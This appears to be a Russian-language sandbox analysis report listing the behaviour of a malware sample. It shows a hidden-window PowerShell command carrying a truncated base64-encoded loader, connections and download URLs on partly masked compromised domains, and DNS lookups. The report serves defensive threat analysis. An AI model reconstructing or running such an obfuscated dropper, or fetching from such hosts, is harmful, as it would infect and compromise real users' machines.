Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAHcAZQBnAGgAdABoAD0AKAAnAEYAJwArACgAJwBjAGwAJwArACcAMAAnACkAKwAoACcAXwAnACsAJwBiAGoAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAG4AdgA6AFQARQBtAHAAXABXAG8AcgBkAFwAMgAwAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\829597.cvr
- 'ze####energy.com':80
- 'ze####energy.com':443
- 'mj####tbased.com':80
- 'mj####tbased.com':443
- 'ga#####amapersada.com':443
- http://ze####energy.com/wp-admin/E/
- http://www.mj####tbased.com/cgi-bin/ht/
- 'ze####energy.com':443
- 'mj####tbased.com':443
- 'ga#####amapersada.com':443
- DNS ASK ze####energy.com
- DNS ASK vi###amv1.com
- DNS ASK tu##cip.com
- DNS ASK mj####tbased.com
- DNS ASK ta###akeup.com
- DNS ASK uc########snagpurandchattisgarh.com
- DNS ASK ga#####amapersada.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAHcAZQBnAGgAdABoAD0AKAAnAEYAJwArACgAJwBjAGwAJwArACcAMAAnACkAKwAoACcAXwAnACsAJwBiAGoAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAG4AdgA6AFQARQBtAHAAXABXAG8AcgBkAFwAMgAwAD...' (со скрытым окном)